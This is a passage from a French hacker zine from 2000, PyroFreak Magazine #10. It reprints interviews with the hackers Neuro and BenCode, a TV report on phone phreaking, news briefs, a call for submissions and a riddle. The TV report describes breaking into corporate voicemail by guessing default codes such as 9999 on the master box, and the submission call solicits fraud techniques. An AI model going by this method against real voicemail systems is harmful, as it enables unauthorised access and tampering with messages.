des enfants de coeur. Il y a ceux qui détruisent les systèmes informatiques et les autres qui s'en servent pour leur bonheur personnel. Neuro se situe dans la deuxième catégorie. "Moi, je ne fais jamais de tort . Quand je vois qu'il y a un bogue dans l'ordinateur que j'attaque, je l'exploite, mais je ne fais jamais de merde à la compagnie ou au site web. Après j'envoie un courriel pour dire comment je me suis pris pour faire le hack afin que la compagnie puisse faire les changements nécessaires pour éviter que ce genre de situation ne se reproduise." Est-ce votre vrai job? "Disons que je fais ça dans mes temps libres, toutefois certaines compagnies m'engagent pour rendre leur site ou leur server plus sécuritaire." Pyrofreak c'est un groupe de pirates virutels francophones Et la sécurité? Quel regard portez-vous sur le Net? "Internet est la plus grande révolution dans le monde de l'électronique. Cependant, tout s'est passé trop rapidement. Nul n'étais prêt à notre arrivée à nous, les hackers. Chaque jour, il y a des centaines de sites qui sont la cible de pirates. Internet est devenu un véritable champ de bataille entre la sécurité informatique et nous." Quelles sont les plus belles cibles pour un hacker? "Les sites les plus populaires d'après moi sont Ebay, Yahoo, Altavista, le site du KKK et de la Maison Blanche. Ils y ont tous passé." On dit que le service de courriels Hotmail est très facile a pirater? "Très, très facile! J'appelle même plus ca du piratage..." Maintenant, l'éternelle question, sommes-nous en sécurité quand on magasine sur le Net? "Je ne pense pas. Mon père paie chaque jour ces comptes par Internet, il pense que c'est sécuritaire. Il n'a pas idée de l'ampleur de la guerre virtuelle qui est présentement en cours..." D'une certaine facon, n'êtes-vous pas les chiens de garde d'internet? "Comme disait le directeur de la CIE: Les hackers sont essentiels. Ils trouvent les failles et on n'a même pas à les payer pour le faire. Je crois que je n'ai rien à dire de plus", conclut-il. Les nouveaux pirates Par Marie Plourde Le Journal de Montréal, Jeudi 17 Février 2000 Page 54 Les pirates virtuels ont la cote. Les médias n'en ont que pour eux, enfin que pour leurs coups. Ainsi, les attaques logées contre les populaires sites Yahoo et Amazon et contre le chat public du président Clinton ont fait d'eux de mystérieux personnages. Mais qui sont ces fantômes de l'opéra cachés dans les coulisses du Net ? Difficile d'entrer en contact avec les hackers, des personnages pleins de paradoxes. Ils rêvent de devenir les vedettes de leur milieu, de faire connaître leur surnom dans le monde, et ce, tout en conservant l'anonymat, parce qu'être hacker, c'est tout aussi légal, dans certains cas, que d'être braqueur de banques. Comme des voleurs, ils pénètrent des lieux sans autorisation, se livrent parfois au vandalisme et s'emparent de ce qui les branche. Bon, on est loin des gros messieurs tout de cuir et de tatouages vêtus. Et ne se promènent pas avec des pistolets et des pieds-de-biche non plus. N'empêche que le hacking est considéré comme un crime. Rencontre avec BenCode Oui, il est difficile d'entrer en contact avec les hackers, le répertoire des pirates anonymes avec adresses et numéros de téléphone n'existant pas encore. Aussi mes premières approches furent plutôt décevantes. Puis il y a eu BenCode, rigolo personnage de 19 ans qui hacke à temps plein partiel depuis six ans. Malgré sa triste moyenne scolaire de 37 pour cent (il s'ennuie mortellement à l'école), il est un véritable technophile capable de vulgariser tout se qui se passe dans Internet. Ironiquement, il étudie en sécurité informatique . Est-ce pour mieux déjouer les compagnies ? Est-ce la tactique du cheval de Troie ? Un peu, oui, mais BenCode est avant tout un autodidacte, comme la majorité des pirates, et les connaissances qu'il stocke sur le terrain l'aideront plus tard à détecter les failles des systèmes informatiques. Ne riez pas, il pourrait même en faire un métier un jour. C'est vrai, ça prend un hacker pour penser comme un hacker, c'est pourquoi bien des grandes sociétés font appel à leurs services, qu'elles paient chèrement. La spécialité de BenCode, noter « pirate », est le carding, soit la fraude informatique et la sécurité réseautique. Cependant, il n'est pas évident à comprendre, ce Ben. Il communique dans un indéchiffrable charabia. J'aurais eu besoin du dictionnaire du parfait petit hacker pour le décoder. Disons que BenCode, son surnom, est bien choisi. Quand je lui ai fait remarquer que son langage était difficile à suivre, il m'a simplement répondu que c'était juste pour parler plus vite. Exemple : « Un hacker travail seul c bin sur, mais il a tjs un appui en arrière au cas qu i ay un chiard kelkonc. » Traduction outremontaise : « Il est bien évident qu'un pirate d'Internet ? oeuvre de façon solitaire. Cependant, il peut toujours bénéficier d'un groupe d'appui, si bien sûr ses opérations tournent mal. » Conseils de Ben Fort de ses six années de bizounage dans le Net, BenCode sait quels pièges attendent les utilisateurs. Selon lui, la sécurité des boîtes de courriels laisse à désirer. Il n'y a pas si longtemps, Hotmail, m'a-t-il dit, était une véritable passoire. On pouvait lire dans les comptes de tous les usagers. La situation s'est toutefois améliorée depuis, mais ce n'est qu'une question de temps... Ainsi, il recommande, pour les courriels, de s'abonner à des sites qui demandent des mots de passe de plus de huit caractères. Il faudrait également se méfier des achats par carte de crédit dans le Net, qu'on ne doit faire seulement que si on est certain que la compagnie a un haut niveau d'encryptage des numéros. Venant d'un gars pour qui le hacking est aussi thrillant que le sexe, j'ai tendance à le croire. _________________________ Branché TV SRC 25 Mars 00 Les pirates du téléphone --------------------------------------------------------------------------- Complément d'information Le phreaker que nous avons interviewé est membre d'un groupe de hackers appelé Pyrofreak, qui compte une douzaine de membres et une vingtaine de collaborateurs. Pyrofreak est surtout connu, dans le milieu underground, pour ses «zines», farcis d'un humour subversif à souhait. Le Module des crimes technologiques ne semble pas avoir de présence sur le site du Service de police de la CUM. Vous trouverez toute la fascinante histoire de Cap'n Crunch sur son site web. Il n'est pas associé, de près ou de loin, avec les délicieuses cérérales Capitaine Crounche. La fréquence de son célèbre sifflet, 2600 Hz, explique d'ailleurs pourquoi le nombre 2600 a été adopté par les premiers phreakers et hackers des années 80. C'est même le titre d'un magazine spécialisé fort instructif. À un moment dans le reportage, on fait allusion au fait que, selon certains, les hackers pouvaient être considérés comme un service public. Cette idée n'a pas été émise par un deux de pique. C'est Michael Jacobs, directeur adjoint de la National Security Agency, l'agence qui est, entre autres, responsable de la sécurité de l'infrastructure de l'information des États-Unis. Dans une entrevue à Wired News, M. Jacobs explique que par leurs attaques continuelles sur les réseaux, les hackers mettent le doigt sur des bobos qu'on ne verrait pas autrement. Et comme l'économie mondiale dépend de plus en plus des réseaux, qu'il importe que l'infrastructure de l'information soit fiable, les hackers jouent un rôle bénéfique, selon lui. -------------------------------------------------------------------------- Journaliste: Jean-Hugues Roy Réalisatrice: Laurence Dupuis Bonjour et bienvenue à Branché. Ici Jean Hugues Roy et aujourd'hui on vous parle tout d'abord de ces gens disons extrèmement talentueux en informatique et qu'on appelle les hackers. On va voir donc dans notre premier reportage que si la plupart des hackers aiment bien travailler au clavier, il y en a aussi que l'on appelle en fait les phone phreakers qui aiment plutôt travailler au combiné. Personne n'est a l'abri du piratage. Le service de politique de la CUM l'a appris l'automne dernier, lorsque les boites vocales de 27 de ses détectives ont été violées par un pirate. — Il a tenté différents mots de passe jusqu'à ce qu'il trouve un mot de passe facile, un mot de passe un peu par défaut, là, 1, 2, 3, 4, 5, 6, et puis là, il a écouté les messages, il a effacé un message qui était destiné à des enquêteurs dans un centre d'enquête. Le pirate responsable a été appréhendé à la mi-janvier, mais d'autres continuent à explorer des boites vocales. — J'appuie sur l'étoile pour accéder. Neuro est un hacker de système téléphonique, ce qu'on appelle en fait un phreaker. — Je suis déjà tombé sur une banque avec un système mal protégé. — Et qu'est-ce qu'il y avait? — C'est des informations qui s'échangeaient que j'aurais pu prendre et m'en servir pour des causes lucratives. L'histoire des phreakers remonte au début des années 1970, quand un dénommé John Traper s'est rendu compte par hasard qu'un sifflet trouvé dans une boite de céréales Capitaine Crunch avaient d'étranges propriétés. Le sifflet émettait une tonalité à 2600 hertz qui, émise dans un combiné, permettait de faire des appels interurbains gratuitement. JACQUES VIAU, coordinateur, Module des crimes technologiques, SPCUM — Moi, je regarde dans l'historique, puis il y a des gens qui se branchaient à des appels interurbains à l'autre bout du monde, sans savoir même à qui ils parlaient, dans une cabine téléphonique, juste pour être capable de dire: Wow! Je l'ai fait! Je suis capable! Et puis de continuer à parler à n'importe qui. Aujourd'hui, 30 ans plus tard, la nouvelle génération de phreakers procède de la même façon, c'est-à-dire à tatons. — Ça fait que là, je vais essayer une compagnie de la région, OK! — Par hasard? Comment tu l'as choisie cette entreprise-là? — Je l'ai choisie par rapport que l'image est grosse dans le bottin. - Ah! Bon! - Ça se voit bien. La méthode de Neuro est toute simple. Il commence en se connectant à un système, en se faisant passer pour un usager régulier de la compagnie. — «Bonjour! Ici le serveur vocal interactif OCTEL.» Il peut tout d'abord essayer des boites vocales avec différents mots de passe par défaut, c'est-à-dire faciles à deviner. — «Veuillez composer votre mot de passe.» Il affirme qu'il peut ainsi pénétrer dans 30% des boites vocales appartenant à des individus. Sauf qu'il s'intéresse plutôt à ce qu'il appelle la boite maîtresse, celle qui contrôle tout un système donné et dont le numéro est souvent 9999. Et parfois, Neuro tombe sur des boites maîtresses dont le mot de passe est aussi 9999. — Ça, c'est la boite vocale qui contrôle toutes les autres. Ça fait que même si le monde du système protège leur boite vocale au maximum avec un mot de passe, par exemple de 10 caractères, de 10 chiffres... — Oui? — Ça ne donne absolument rien par rapport qu'avec celle-là, je peux toutes les «reseter», les mettre à zéro. Et il peut faire bien d'autres choses encore. — Je pourrais changer la musique quand ça sonne occupé aussi, le message d'attente. Je pourrais changer l'heure du système, changer plus de mots de passe. Selon Neuro, une entreprise sur dix protège mal son réseau de messagerie vocale au Québec. Une évaluation qui ne surprend pas Jacques Viau du module des crimes technologiques du Service de police de la CUM. — On met beaucoup de technologie tout d'un coup et puis c'est pas toujours toutes les entreprises qui sont hyper- compétentes dans la technologie qu'ils déploient. Un laisser-aller que Neuro exploite à loisir auprès des PME de sa région. — Aucun message. — Ah! Et là leur mot de passe, c'était quoi? — Ah! Les 4 derniers chiffres du numéro de téléphone. La tentation est grande alors de choisir un mot de passe qui est facile à retenir. — J'ai un mot de passe pour entrer sur un système, un autre mot de passe pour entrer sur un autre, j'ai deux mots de passe sur mon portable, j'ai un mot de passe pour ma boite vocale ici, un mot de passe pour ma boite vocale chez moi. J'ai trois comptes, trois accès Internet, j'ai trois mots de passe différents. Neuro insiste sur le fait qu'il ne fait rien de mal, mais il admet qu'il se laisse parfois emporter. — Comme une compagnie, exemple, en informatique, qui vend du matériel de piètre qualité, j'ai changé le même message dans les trois. Je veux dire que j'ai conseillé au monde d'aller magasiner ailleurs. C'est ce qui fait que de pénétrer sans autorisation dans une boite vocale est quand même un crime rappelle Jacques Viau. — Euh, si on compare ça a une agression sexuelle ou un homicide, bien entendu, c'est un crime qui ne touche pas directement à l'intégrité d'une personne. Par contre, ça pourrait avoir des conséquences très graves, le fait d'effacer un message. Pourtant, Neuro dit qu'au contraire, il rend service au public. - Si la personne se fait pirater son système, on va essayer de changer pour du meilleur, toujours du meilleur. Parfois même, Neuro laisse des messages à des entreprises pour les avertir qu'elles sont vulnérables, mais cette attitude de Robin des Bois technologique ne convainc pas les autorités. — Moi, je ne pense pas que tu veuilles que je vole ton auto juste pour te montrer que ton auto est vulnérable, OK? — Et toi, pourquoi tu fais ça? — J'aime ça, j'aime savoir du nouveau. Je veux dire, j'ai toujours aimé jouer avec la technologie, je veux dire, jouer avec la limite, là. Qu'est-ce que les gens pensent pas que tu pourrais faire. J'aime ça, c'est comme une drogue. Bref, la meilleure protection reste peut-être les bonnes vieilles technologies. Pour la suite, Crédit Taz Magazine (www.zataz.com) Motorola a de grande oreille Motorola vient de déposer un brevet décrivant un mécanisme de détournement d'appels. Cette technique permettrait, selon le magazine britannique The Scientist, de contourner la trop grande sécurité des liaisons point à point, utilisées par les essaims de satellites à orbite basse. La CIA espionne nos entreprises James Woolsey, ancien directeur de la CIA a admis, dans les colonnes de Heise Online, que les services secrets américains pratiquent l'espionnage industriel, principalement dans les pays Européens. Cet espionnage des entreprises européennes se justifie par le fait qu'elles se servent de pots de vin pour gagner les contrats internationaux. James Woolsey précise également qu'il espère que le gouvernement des Etats Unis continuera d'espionner les entreprises qui se servent de pratiques de négociations déloyales. Mon portable est un mouchard Un américain, Kévin Manley, a découvert qu'en faisant des achats sur le web, via son téléphone portable, son numéro de téléphone était communiqué aux sites web qui en faisaient la demande. Il a découvert ce traçage en achetant des bouquins chez Amazon.com. Il est abonné chez Sprint. Rien n'empêche de penser que les autres fournisseurs d'abonnement téléphonique ne font pas de même. Microsoft n'est pas une succursale de la NSA Microsoft dément formellement les allégations selon lesquelles la société aurait des liens avec les services de renseignement américains. Suite aux rumeurs récentes citées par des sources médiatiques, Microsoft tient à préciser qu'en aucun cas la société n'a installé, en France ou dans tout autre pays, un système permettant à une administration américaine telle que la " National Security Agency ", ou tout autre service dépendant du gouvernement américain, de décoder les informations chiffrées provenant d'un ordinateur équipé de Windows. Microsoft dément complètement cette rumeur. Il n'existe pas de mécanisme de ce type dans Windows, ni même dans tout autre logiciel commercialisé par Microsoft dans le monde. La guerre est ouverte Le service de la défense nationale canadienne vient d'annoncer la création d'une section anti pirate pas comme les autres. Une équipe de scientifiques et d'informaticiens ont été regroupés dans le centre de recherche de la défense basé à Ottawa. Leurs missions : concevoir de nouvelles mesures de sauvegarde en imitant les pirates, en créant de nouveaux virus afin de les étudier et concevoir de nouvelles défenses. Le directeur général de ce nouveau service se nomme Prakash Bhartia, il a expliqué que son équipe était composée de 14 personnes. ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 : |28-Conclusion '.________Par Neuro_____________ _______ neuro@pyrofreak.org __ __ Un autre numéro de fini. Donc, si vous avez des idées sur comment amiliorer le magazine, faite le nous savoir a pyrofreakmag@hotmail.com , et ca va nous faire plaisir de lire cela. Bref, notre but c'est toujours de s'amiliorer, donc on est ouvert pas mal a toute. Désolé encore une fois pour le retard de 2 mois de ce numéro. On va essayer d'etre plus ponctuel pour le prochain numéro, qui devrais sortir vers le début des vacances d'été (Début Juin, Mi-Juin). Encore une fois, merci de nous avoir lu! ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à | |pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) | |SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en | |page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-| |tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . | |__________________________________________________________________________| Sujets D'articles proposés: -Logs de scan 1-800 ou autres -Explication de nouveaux type de Vmb ou Pbx -Critiques de divers programmes se rapportant a l'underground -Informations intéressantes sur les cellulaires ou pagettes (Tatoo) -Informations intéressantes sur un type de fraudage -Technique de hack particulières -Anecdote particulière -Programmation intéressante pour L'underground -Etc, utilisez votre imagination! Site Web: www.PyroFreak.org IRC Chan: #PyroFreak -------->ÉNIGME<-------- Pour conclure, voici une petite énigme de Einstein: "Merci à |[3M^N qui nous a communiqué l'énigme" Selon Einstein, "70%" des gens sont INCAPABLES de résoudre le test suivant. Il faut trouver qui éleve les poissons. Il y a 5 maisons alignées de couleurs différentes. Dans chaque maison vit une personne de nationalité différente. Chaque personne fume un type de cigarette, boit une boisson et éleve un animal différents. Il faut trouver qui éleve les poissons. 1. L'Anglais vit dans la maison rouge. 2. Le Suédois éleve des chiens. 3. Le Danois boit du thé. 4. La maison verte est juste a coté de la maison blanche. 5. Le propriétaire de la maison verte boit du café. 6. L'homme qui vit dans la maison du centre boit du lait. 7. Le fumeur de Pall Mall éleve des oiseaux. 8. Le Norvégien vit dans la premiere maison. 9. L'homme qui fume des Blend vit a coté de celui qui éleve des chats. 10. La personne qui éleve des chevaux vit a coté du fumeur de Dunhill. 11. L'homme qui fume des Blue Master boit de la biere. 12. L'Allemand fume des Prince. 13. Le Norvégien vit a coté de la maison bleue. 14. L'homme qui fume des Blend a un voisin qui boit de l'eau. 15. Le propriétaire de la maison jaune fume des Dunhill. NB: C'est normal que ca prenne une quarantaine de minutes si c'est pas plus pour trouver l'énigme. La réponse se retrouve à la fin de ce mag. Pensée: Moi cé moi! _____ _____ _ ______ ______ __ ___ _________ |: __ _ \ \ \ / / | ____ | / ___ | | \__ _\ \ \ \/ ; / |; /_ _/ | / / /; | | ____ __ ___\ \ : / |: _ / | / / : | |: | / , / |, | \ : \ | :\__/ | |; | ___/ . / |. | \ ; \ | ; / |___\ \________/ |___\ \__ ____\ |__________| ____ _ ___ __ ___ ___ ______ __ _______ |: _ _ ;\ | \ \ \ / ;| | | / . / | | \_______\ |: _\ \_ _\ / /| :| | ;| / / _| |___ _____ |; |__ ____ / <_| ,| | |/ : / |_|, ___| |; .\ | __\ \_:__\ / _ | | ;/ |: | |: ` / | :|____ ____ \ / |; | | |\ \ |; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ \ |___\ |__| \_| |________\ \____\ |____| |___\ \_____\ Crédit: __2 '::-::` (o o) ooO--(_)--Ooo- 2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE _________________________________________ / . . . . . \ | . . . . | | . . | '-----,----,--.--,----,-----,----,----,-----' | |) | | | |) | ___| __| |) | | | | | /| .__. __| / | |) | | | \| | | | | \ '----'-----'-'--'-----'----'-'--' ,--, ,--, ,--, ,------,--, ,--, | |_| | / __ \ | | |/ / | |/ /__\ \| ___| ( | ,-, | __ | | \ | | | | / \ | | |\ | ,-----'--' '--'-- --'------'--' ---'-----, | | \_________________________________________/ venez gouter a notre tout nouveau RHOOTER JR (c) RHOOTER JR is a burger hack trademark n.b Merci Wyzeman pour le Burger Hack :) C'est l'Allemand qui élève les poissons